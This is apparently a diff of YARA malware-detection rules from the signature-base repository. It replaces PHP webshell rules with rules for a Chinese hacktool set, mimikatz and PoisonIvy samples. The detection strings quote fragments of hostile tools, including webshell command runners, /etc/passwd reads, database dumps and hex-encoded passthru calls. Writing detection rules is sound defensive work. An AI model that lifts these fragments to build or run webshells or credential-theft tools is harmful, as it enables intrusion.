+		$s5 = "[*] User has been successfully added" fullword ascii
+		$s6 = "[>] ms11-08 Exploit" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Ftpsearch
+rule SIGNATURE_BASE_Epathobj_Exp64 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file ftpsearch.php"
+		description = "Chinese Hacktool Set - file epathobj_exp64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9db8f00a-1843-5057-b8c7-a7f7b63e0659"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6740-L6754"
+		id = "cb56bbdc-8afa-5b4b-b7df-942dd3d60366"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2419-L2438"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
-		logic_hash = "6b32553be4fdf26776e3cbb8a5d4d011d88f2bd50949b65934df72b89065aeec"
+		hash = "09195ba4e25ccce35c188657957c0f2c6a61d083"
+		logic_hash = "dc4073a7d319cffbbce7b3c7b7cf02b007839b72fe14ec1fbdcd3343d57cf7bf"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
-		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
-		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
-		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
+		$s1 = "Watchdog thread %d waiting on Mutex" fullword ascii
+		$s2 = "Exploit ok run command" fullword ascii
+		$s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" ascii
+		$s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii
+		$s5 = "Mutex object did not timeout, list not patched" fullword ascii
+		$s6 = "- inconsistent onexit begin-end variables" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell__Cyber_Shell_Cybershell_Cyber_Shell__V_1_0_
+rule SIGNATURE_BASE_Kelloworld_2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
+		description = "Chinese Hacktool Set - file kelloworld.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79146f25-87b9-5216-af88-4e433bb08b90"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6755-L6772"
+		id = "3f298004-e618-5f4a-9cd7-c7c954b6fc64"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2440-L2455"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fc2cf9a25ccc5aa3d9dc287ef9600b065ba9025cfb0a1ccca1bce9120ea03ff4"
+		hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
+		logic_hash = "a575c30c06bd84196cbf01a9b5ef3a042cf29553610421b019227d30a2c7ad1c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
-		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
-		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
 
 	strings:
-		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
-		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
-		$s11 = " *   Coded by Pixcher" fullword
-		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
+		$s1 = "Hello World!" fullword wide
+		$s2 = "kelloworld.dll" fullword ascii
+		$s3 = "kelloworld de mimikatz pour Windows" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Webshell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_Soldierofallah
+rule SIGNATURE_BASE_Hscan_V1_20_Hscan : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
+		description = "Chinese Hacktool Set - file hscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a158d158-d48d-514c-8b7b-4b6a4a10d021"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6773-L6793"
+		id = "4183824c-b77f-5500-a962-8d9dc78a9388"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2457-L2474"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0b9e0d96c8a618a4883235e8c5c9a03a1e0b586cb4b30e0273e24c35ee5ee502"
+		hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
+		logic_hash = "8e30c366c5d5c34a7b50ba4dec17a46c173196b773fff6965891802bcebeb112"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
-		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
-		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
 
 	strings:
-		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
-		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
-		$s3 = "$dt = $_POST['filecontent'];" fullword
-		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
-		$s6 = "print \"Sorry, none of the command functions works.\";" fullword
-		$s11 = "document.cmdform.command.value='';" fullword
-		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
+		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
+		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii
+		$s3 = ".\\report\\%s-%s.html" fullword ascii
+		$s4 = ".\\log\\Hscan.log" fullword ascii
+		$s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_7
+rule SIGNATURE_BASE__Project1_Generate_Rejoice : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive"
+		description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "506373d6-31b4-5a14-b009-f2b43028a98b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6794-L6812"
+		id = "4b36d450-1194-527c-8565-7f321d486d01"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2476-L2497"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9d9b6b1333f2061c357fad110b5cc508288c70aea1212aa2fcbf283a2ce4fb2c"
+		logic_hash = "b66bb4d392881468b33a8ee4458f33bfe7a82d34cc3927eedccd54ad94ff6a04"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
-		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
-		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
-		hash3 = "715f17e286416724e90113feab914c707a26d456"
+		hash0 = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
+		hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
+		hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
 
 	strings:
-		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
-		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
-		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
-		$s4 = "if( $action == \"dumpTable\" )" fullword
+		$s1 = "sfUserAppDataRoaming" fullword ascii
+		$s2 = "$TRzFrameControllerPropertyConnection" fullword ascii
+		$s3 = "delphi32.exe" fullword ascii
+		$s4 = "hkeyCurrentUser" fullword ascii
+		$s5 = "%s is not a valid IP address." fullword wide
+		$s6 = "Citadel hooking error" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Webshell__Small_Web_Shell_By_Zaco_Small_Zaco_Zacosmall
+rule SIGNATURE_BASE__Hscan_Hscan_Hscangui : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
+		description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99dbcea6-7208-5bbe-b200-9ea3074d7855"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6813-L6831"
+		id = "174b0ee4-23ce-59fd-a784-ab58fd13ce67"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2499-L2519"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "840c58043e39014e90e7621c1d2417d5a970c744560738abc4fea3db3cbb8d5a"
+		logic_hash = "5466c3dd8b2b777186bfab9d0948905eb3692ce05cf4748fb5b7b896dc3cb251"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
-		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
-		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
-		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
+		hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
+		hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
+		hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07"
 
 	strings:
-		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
-		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
-		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
-		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
+		$s1 = ".\\log\\Hscan.log" fullword ascii
+		$s2 = ".\\report\\%s-%s.html" fullword ascii
+		$s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii
+		$s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii
+		$s5 = "Scan %d targets,use %4.1f minutes" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_8
+rule SIGNATURE_BASE_Kiwi_Tools : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive"
+		description = "Chinese Hacktool Set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40c6f69f-9963-5e4f-af44-041d47738519"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6832-L6851"
+		id = "000f0081-b035-5c73-8da2-addde2b55303"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2521-L2554"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "346df2686c4d43b3210b07a30845477e057602500e67baba69b50c41e8d501fa"
+		logic_hash = "ce7b3c7d57740257013d9d589444a3b53e81254619bd3f09ece917c70bba03ce"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
-		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
-		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
+		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
+		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
+		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
+		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
+		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
+		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
+		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
+		hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8"
+		hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
+		hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
+		hash10 = "febadc01a64a071816eac61a85418711debaf233"
+		hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
+		hash12 = "56a61c808b311e2225849d195bbeb69733efe49a"
+		hash13 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
+		hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
+		hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
+		hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab"
+		hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
 
 	strings:
-		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
-		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
-		$s3 = "/* I added this to ensure the script will run correctly..." fullword
-		$s14 = "<!--    </form>   -->" fullword
-		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
-		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
+		$s1 = "http://blog.gentilkiwi.com/mimikatz" ascii
+		$s2 = "Benjamin Delpy" fullword ascii
+		$s3 = "GlobalSign" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Webshell__PH_Vayv_Phvayv_PH_Vayv_Klasvayv_Asp_Php
+rule SIGNATURE_BASE_Kiwi_Tools_Gentil_Kiwi : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
+		description = "Chinese Hacktool Set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1575591b-3245-5c3d-b2a4-6def89e77032"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6852-L6870"
+		id = "4ad54580-b10b-5b17-8d8a-510e210e04d1"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2556-L2587"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "42959ba1e3c0f7f198f953e98b9df87059999f5526df4338c109828d0a5a518a"
+		logic_hash = "1a88bb31e985ae2119b578494ce9130204b41eece5929865c0822cdc82eaba75"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
-		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
-		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
-		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
+		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
+		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
+		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
+		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
+		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
+		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
+		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
+		hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
+		hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
+		hash9 = "febadc01a64a071816eac61a85418711debaf233"
+		hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
+		hash11 = "56a61c808b311e2225849d195bbeb69733efe49a"
+		hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
+		hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
+		hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
+		hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
 
 	strings:
-		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
-		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
-		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
-		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
+		$s1 = "mimikatz" fullword wide
+		$s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide
+		$s3 = "Gentil Kiwi" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_9
+rule SIGNATURE_BASE_Poisonivy_Sample_APT : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
+		description = "Detects a PoisonIvy APT malware group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "98927127-08be-57ac-a090-38c7e614dae7"
-		date = "2014-04-06"
-		modified = "2022-12-06"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6872-L6892"
+		id = "8d3b8222-8949-57dc-99b7-092189416efd"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9f8768f609ccd464f7c2b9d10ce8ea423355e11b05b39e629e5e3de0787e212b"
+		hash = "b874b76ff7b281c8baa80e4a71fc9be514093c70"
+		logic_hash = "938df757d1f5ee1028d61dbc2ab76a33c788a44f87cb0d84626420e20bfb5fa4"
 		score = 70
-		quality = 77
-		tags = ""
-		super_rule = 1
-		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
-		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
-		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { 3a 3c 62 3e 22 20 2e 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 24 5f 50 4f 53 54 5b 27 74 6f 74 27 5d 29 2e 20 22 3c 2f 62 3e 22 3b }
-		$ = { 69 66 20 28 69 73 73 65 74 28 24 5f 50 4f 53 54 5b 27 77 71 27 5d 29 20 26 26 20 24 5f 50 4f 53 54 5b 27 77 71 27 5d 3c 3e 22 22 29 20 7b }
-		$ = { 70 61 73 73 74 68 72 75 28 24 5f 50 4f 53 54 5b 27 63 27 5d 29 3b }
-		$ = { 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 72 61 64 69 6f 22 20 6e 61 6d 65 3d 22 74 61 63 22 20 76 61 6c 75 65 3d 22 31 22 3e 42 36 34 20 44 65 63 6f 64 65 3c 62 72 3e }
+		$s0 = "pidll.dll" fullword ascii
+		$s1 = "sens32.dll" fullword wide
+		$s3 = "FileDescription" fullword wide
+		$s4 = "OriginalFilename" fullword wide
+		$s5 = "ZwSetInformationProcess" fullword ascii
+		$s9 = "Microsoft Media Device Service Provider" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 47KB and all of them
 }
-rule SIGNATURE_BASE_Webshell__PH_Vayv_Phvayv_PH_Vayv
+rule SIGNATURE_BASE_Poisonivy_Sample_APT_2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
+		description = "Detects a PoisonIvy Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1575591b-3245-5c3d-b2a4-6def89e77032"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6894-L6910"
+		id = "4d64ccd2-add8-5749-8178-f2c5336e1495"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L24-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b2f2b95415bc990adac38eada20cbc793f286d51f2054bc969e9c667f16717f9"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "333f956bf3d5fc9b32183e8939d135bc0fcc5770"
+		logic_hash = "58d62278d776c9f7c3ae0815aa4b248f85c5fc648405b8d1ba2b8eb2847e1e88"
+		score = 70
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
-		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
-		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
 
 	strings:
-		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
-		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
-		$s17 = "name=\"duzenx2\" value=\"Klas" fullword
+		$s0 = "pidll.dll" fullword ascii
+		$s1 = "sens32.dll" fullword wide
+		$s2 = "9.0.1.56" fullword wide
+		$s3 = "FileDescription" fullword wide
+		$s4 = "OriginalFilename" fullword wide
+		$s5 = "ZwSetInformationProcess" fullword ascii
+		$s6 = "\"%=%14=" fullword ascii
+		$s7 = "091A1G1R1_1g1u1z1" fullword ascii
+		$s8 = "gHsMZz" fullword ascii
+		$s9 = "Microsoft Media Device Service Provider" fullword wide
+		$s10 = "Copyright (C) Microsoft Corp." fullword wide
+		$s11 = "MFC42.DLL" fullword ascii
+		$s12 = "MSVCRT.dll" fullword ascii
+		$s13 = "SpecialBuild" fullword wide
+		$s14 = "PrivateBuild" fullword wide
+		$s15 = "Comments" fullword wide
+		$s16 = "040904b0" fullword wide
+		$s17 = "LegalTrademarks" fullword wide
+		$s18 = "CreateThread" fullword ascii
+		$s19 = "ntdll.dll" fullword ascii
+		$s20 = "_adjust_fdiv" ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 47KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_1
+rule SIGNATURE_BASE_Poisonivy_Sample_APT_3 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Dive Shell 1.0"
+		description = "Detects a PoisonIvy Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a87038b-3f78-5b9a-a209-c9026d83363f"
-		date = "2014-04-06"
-		modified = "2022-12-06"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6912-L6931"
+		id = "e2e0bf75-7704-585f-b2b3-727d14946c76"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L60-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9e3759d45d13e33481b962c4b59a019647a3e80bdd3885c4404169af74288b89"
+		hash = "df3e1668ac20edecc12f2c1a873667ea1a6c3d6a"
+		logic_hash = "96f8324dcf85f5baa64178774abf17516a9e023dd6fa38e2bce0fe5159a4f704"
 		score = 70
-		quality = 79
-		tags = ""
-		super_rule = 1
-		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
-		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
-		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
-		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { 76 61 72 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3d 20 6e 65 77 20 41 72 72 61 79 28 3c 3f 70 68 70 20 65 63 68 6f 20 24 6a 73 5f 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3f 3e 29 3b }
-		$ = { 69 66 20 28 65 6d 70 74 79 28 24 5f 53 45 53 53 49 4f 4e 5b 27 63 77 64 27 5d 29 20 7c 7c 20 21 65 6d 70 74 79 28 24 5f 52 45 51 55 45 53 54 5b 27 72 65 73 65 74 27 5d 29 29 20 7b }
-		$ = { 69 66 20 28 65 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 33 38 20 26 26 20 63 75 72 72 65 6e 74 5f 6c 69 6e 65 20 3c 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 2e 6c 65 6e 67 74 68 2d 31 29 20 7b }
+		$s0 = "\\notepad.exe" ascii
+		$s1 = "\\RasAuto.dll" ascii
+		$s3 = "winlogon.exe" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_2
+rule SIGNATURE_BASE_Poisonivy_Sample_APT_4 : FILE
 {
 	meta:
